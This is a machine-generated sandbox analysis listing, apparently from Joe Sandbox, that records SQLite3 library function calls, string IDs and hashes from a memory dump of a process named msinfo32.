                                                                                                              • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                                              • String ID: AND$NOT
                                                                                                              • API String ID: 966554101-2843896482
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                                                                              • String ID: NEAR$phrase
                                                                                                              • API String ID: 1840970956-1639708222
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                              • String ID: winAccess
                                                                                                              • API String ID: 2284118020-3605117275
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_value_text.SQLITE3 ref: 61E35F85
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_value_bytes.SQLITE3 ref: 61E35F92
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_get_auxdata.SQLITE3 ref: 61E35FCD
                                                                                                                • Part of subcall function 61E35F6F: memcmp.MSVCRT ref: 61E35FF5
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C9A7
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_mprintf.SQLITE3 ref: 61E3C88F
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_result_error.SQLITE3 ref: 61E3C8A9
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_free.SQLITE3 ref: 61E3C8B1
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3CA4B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                                                                              • String ID: J$null
                                                                                                              • API String ID: 3173415908-802103870
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CBC8
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CBE8
                                                                                                              • sqlite3_result_value.SQLITE3 ref: 61E3CC30
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_mprintf.SQLITE3 ref: 61E3C5AF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_result_error.SQLITE3 ref: 61E3C5C5
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_free.SQLITE3 ref: 61E3C5CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                                              • String ID: replace
                                                                                                              • API String ID: 822508682-211625029
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E1B979
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • sqlite3_realloc.SQLITE3 ref: 61E1B9C7
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B9DD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                              • String ID: d
                                                                                                              • API String ID: 211589378-2564639436
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D681
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_context
                                                                                                              • String ID: "$,$\
                                                                                                              • API String ID: 2928764607-4027707629
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                              • String ID: <
                                                                                                              • API String ID: 2918918774-4251816714
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2820F: sqlite3_log.SQLITE3(?,?,?,?,?,61E282C2), ref: 61E2824A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2834E
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28389
                                                                                                                • Part of subcall function 61E25225: sqlite3_log.SQLITE3 ref: 61E2524E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: out of memory
                                                                                                              • API String ID: 2575432037-2599737071
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                              • API String ID: 1646373207-328863460
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1E091
                                                                                                                • Part of subcall function 61E19B06: sqlite3_initialize.SQLITE3 ref: 61E19B11
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1E1A8
                                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E1E2CB
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1E2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_malloc64sqlite3_result_doublesqlite3_result_error_code
                                                                                                              • String ID:
                                                                                                              • API String ID: 129515768-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                              • String ID:
                                                                                                              • API String ID: 2374424446-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E19501: sqlite3_malloc.SQLITE3 ref: 61E1952E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E38575
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E385A8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E38648
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 3567284914-0
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1F2C3
                                                                                                                • Part of subcall function 61E19B06: sqlite3_initialize.SQLITE3 ref: 61E19B11
                                                                                                              • sqlite3_value_dup.SQLITE3 ref: 61E1F316
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E1F34B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_initializesqlite3_malloc64sqlite3_result_error_nomemsqlite3_value_dup
                                                                                                              • String ID:
                                                                                                              • API String ID: 2961385374-0
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E3CD59
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3CD79
                                                                                                              • sqlite3_vfs_find.SQLITE3 ref: 61E3CDB8
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3CEB7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                              • String ID:
                                                                                                              • API String ID: 321126751-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                              • String ID:
                                                                                                              • API String ID: 3596987688-0
                                                                                                              APIs
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E224F8
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E22590
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E225B0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E225B8
                                                                                                                • Part of subcall function 61E12C4A: sqlite3_free.SQLITE3 ref: 61E12CF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082161338-0
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AEB2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AEBA
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AECD
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                                • Part of subcall function 61E09F8C: sqlite3_free.SQLITE3 ref: 61E09FA1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4AF0B
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 3930042888-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E145B6
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E1460D
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E1462A
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E146D2), ref: 61E14651
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779612131-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytes$memmovesqlite3_aggregate_context
                                                                                                              • String ID:
                                                                                                              • API String ID: 1185593704-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3A3EE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3A416
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A427
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_create_function_v2.SQLITE3 ref: 61E3A46C
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 946922136-0
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C88F
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3C8A9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C8B1
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3C8BB
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282944778-0
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90C1D
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90C37
                                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E90C6C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E90C94
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: __dllonexit_lock_onexit_unlock
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                                              APIs
                                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3BFCC
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BFF6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C001
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C014
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_str_vappendfsqlite3_vmprintf
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A67D
                                                                                                                • Part of subcall function 61E0A484: sqlite3_free.SQLITE3 ref: 61E0A4A5
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A690
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A672
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A6B6
                                                                                                                • Part of subcall function 61E0A61B: sqlite3_free.SQLITE3 ref: 61E0A62C
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1DD6E
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E1DD9E
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1DDB4
                                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E1DDCC
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E19057
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1906F
                                                                                                              • strcmp.MSVCRT ref: 61E1908C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1909D
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                              APIs
                                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3AEB0
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3AECE
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3AEDA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3AEE2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_entersqlite3_str_vappendf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2498652501-0
                                                                                                              • Opcode ID: eafc7faeead84d67688c95a6a5a02606c66e203a4712a968a2658c50b1fb2443
                                                                                                              • Instruction ID: 75dad038be49410520c5d6f2648bd251a965843ce64d4af4e21bd13664d193eb
                                                                                                              • Opcode Fuzzy Hash: eafc7faeead84d67688c95a6a5a02606c66e203a4712a968a2658c50b1fb2443
                                                                                                              • Instruction Fuzzy Hash: 87F05E71A047659F9B00AFAD888045EBBE8EEC4654F11C83EE98DC7300F730C840D7A2
                                                                                                              APIs
                                                                                                              • sqlite3_value_pointer.SQLITE3 ref: 61E3BDE0
                                                                                                                • Part of subcall function 61E0E6B2: strcmp.MSVCRT ref: 61E0E6E0
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BDF9
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3BE0F
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BE17
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2416658597-0
                                                                                                              • Opcode ID: bb7a3ef8e6ea67db5deaefc35ad2afac29a0ce0b5f97dfc5728a7512a886eef8
                                                                                                              • Instruction ID: 265902959247c3317ceb34769e1961c8f60351429da56095b3ea9c982a7aac3c
                                                                                                              • Opcode Fuzzy Hash: bb7a3ef8e6ea67db5deaefc35ad2afac29a0ce0b5f97dfc5728a7512a886eef8
                                                                                                              • Instruction Fuzzy Hash: B9F05EB090C7159BC700BF6D988161ABBE4EB85664F20CA2DE59CCB381E734C4908B92
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B236: sqlite3_blob_close.SQLITE3 ref: 61E4B244
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B27C
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B287
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B292
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B29A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1319845086-0
                                                                                                              • Opcode ID: 2ca99b650c83fa522fd1125df6d5210cf5d48fd29c5eb3f09b68801890af1500
                                                                                                              • Instruction ID: c8cd6b8badaae1739b7b09a8ae277a3f35c8906020eadd5ca4b77c9b1fa56753
                                                                                                              • Opcode Fuzzy Hash: 2ca99b650c83fa522fd1125df6d5210cf5d48fd29c5eb3f09b68801890af1500
                                                                                                              • Instruction Fuzzy Hash: 52F03070544A458FCB40FF78C4C0918B7E4EF44354F51C46DDC8A8B31AE735E4518B11
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADA7
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADB8
                                                                                                              • sqlite3_blob_close.SQLITE3 ref: 61E4ADC3
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADCB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1319845086-0
                                                                                                              • Opcode ID: 1616e11b48d3df0dc10a9ebfdc65c3b2ef8a9964f8c442407640014b50adb3a8
                                                                                                              • Instruction ID: dec895efa54c252f7cb45f19d34ee47ad18e8f95b78a78f695603d128c2bfd85
                                                                                                              • Opcode Fuzzy Hash: 1616e11b48d3df0dc10a9ebfdc65c3b2ef8a9964f8c442407640014b50adb3a8
                                                                                                              • Instruction Fuzzy Hash: E7E065B05447414FDB006FB4D4C4A15BBE4AF8432DF6254BDD88A8B35AE734D490C752
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90CAA
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90CC2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E90CCF
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E90CEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3512769177-0
                                                                                                              • Opcode ID: 3c58fd3e75cd497f032d0b0ad9e6b189ebeadf39ab75494cbf9c0e5cfc1c877e
                                                                                                              • Instruction ID: dc49468b7e690a412fd6c3244f33019cbda001d4082e8e1b4f3a76e37e3c5446
                                                                                                              • Opcode Fuzzy Hash: 3c58fd3e75cd497f032d0b0ad9e6b189ebeadf39ab75494cbf9c0e5cfc1c877e
                                                                                                              • Instruction Fuzzy Hash: FDE01AB0948B8A8BDB007FB885C571DB6E8AB4634DF65846CC9888B215F7B5C4908792
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
